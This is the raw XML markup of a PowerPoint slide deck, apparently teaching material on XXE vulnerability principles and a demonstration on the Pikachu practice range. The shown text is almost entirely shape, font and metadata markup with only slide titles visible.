                <a:gd name="T15" fmla="*/ 478523 h 453"/>
                <a:gd name="T16" fmla="*/ 63535 w 462"/>
                <a:gd name="T17" fmla="*/ 266246 h 453"/>
                <a:gd name="T18" fmla="*/ 276915 w 462"/>
                <a:gd name="T19" fmla="*/ 53969 h 453"/>
                <a:gd name="T20" fmla="*/ 489097 w 462"/>
                <a:gd name="T21" fmla="*/ 266246 h 453"/>
                <a:gd name="T22" fmla="*/ 276915 w 462"/>
                <a:gd name="T23" fmla="*/ 478523 h 4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endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7450784" y="8450839"/>
              <a:ext cx="126832" cy="261114"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 42672 w 107"/>
                <a:gd name="T1" fmla="*/ 0 h 222"/>
                <a:gd name="T2" fmla="*/ 0 w 107"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 107"/>
                <a:gd name="T5" fmla="*/ 156433 h 222"/>
                <a:gd name="T6" fmla="*/ 105496 w 107"/>
                <a:gd name="T7" fmla="*/ 259938 h 222"/>
                <a:gd name="T8" fmla="*/ 125647 w 107"/>
                <a:gd name="T9" fmla="*/ 229357 h 222"/>
                <a:gd name="T10" fmla="*/ 42672 w 107"/>
                <a:gd name="T11" fmla="*/ 134086 h 222"/>
                <a:gd name="T12" fmla="*/ 42672 w 107"/>
                <a:gd name="T13" fmla="*/ 0 h 2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endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4688946" y="345014"/>
            <a:ext cx="2804633" cy="756108"/>
            <a:chOff x="4688946" y="345014"/>
            <a:chExt cx="2804633" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688946" y="345014"/>
              <a:ext cx="2804633" cy="492443"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>漏洞原理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Oval 52"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="734060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0" name="Oval 53"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7541815"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prstClr val="white"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 54"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7743030" y="4686300"/>
                <a:ext cx="101600" cy="101600"/>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596E69"/>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717577" y="2626360"/>
            <a:ext cx="2011680" cy="2011680"/>
            <a:chOff x="2611664" y="2548865"/>
            <a:chExt cx="2011680" cy="2011680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2611664" y="2548865"/>
              <a:ext cx="2011680" cy="2011680"/>
              <a:chOff x="1805940" y="1198245"/>
              <a:chExt cx="2011680" cy="2011680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="圆角矩形 1"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1805940" y="1198245"/>
                <a:ext cx="2011680" cy="2011680"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19981"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="596E69"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="254000" dist="1270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 name="圆角矩形 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1971639" y="1363944"/>
                <a:ext cx="1680278" cy="1680278"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19112"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="E0E0E0"/>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="101600">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="177800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="6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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3081701" y="3076402"/>
              <a:ext cx="1071601" cy="994705"/>
              <a:chOff x="3503864" y="2079606"/>
              <a:chExt cx="1071601" cy="994705"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="文本框 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3503864" y="2427980"/>
                <a:ext cx="107160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rPr>
                  <a:t>02</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln w="12700">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="596E69"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="文本框 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597472" y="2079606"/>
                <a:ext cx="884387"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rPr>
                  <a:t>PRAT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln w="12700">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="596E69"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="LiHei Pro" panose="020B0500000000000000" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5033594" y="3138508"/>
            <a:ext cx="4904489" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>靶场演示</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4,&quot;TopMargin&quot;:0.0,&quot;BottomMargin&quot;:0.0,&quot;IntervalMargin&quot;:1.5,&quot;SettingType&quot;:&quot;System&quot;}"/>
  <p:tag name="KSO_WPP_MARK_KEY" val="bafd75da-0c54-4b3f-86db-e0e8967ffee1"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNzk0OGJiNjk5M2MwMGNlNzc1NzU3OTg3YWY1MzcyMj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4ovak5c">
      <a:majorFont>
        <a:latin typeface="Century Gothic"/>
        <a:ea typeface="方正宋刻本秀楷简体"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Century Gothic"/>
        <a:ea typeface="方正宋刻本秀楷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3268</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>273</Paragraphs>
  <Slides>41</Slides>
  <Notes>41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-apple-system</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>方正宋刻本秀楷简体</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>华文宋体</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Source Code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Docer-Haozai</dc:creator>
  <cp:lastModifiedBy>CSD SJTU</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-03T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T15:49:08Z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8CD048F1E3F3422AA1C009DBF2503269_12</vt:lpwstr>
  </property>
</Properties>
</file>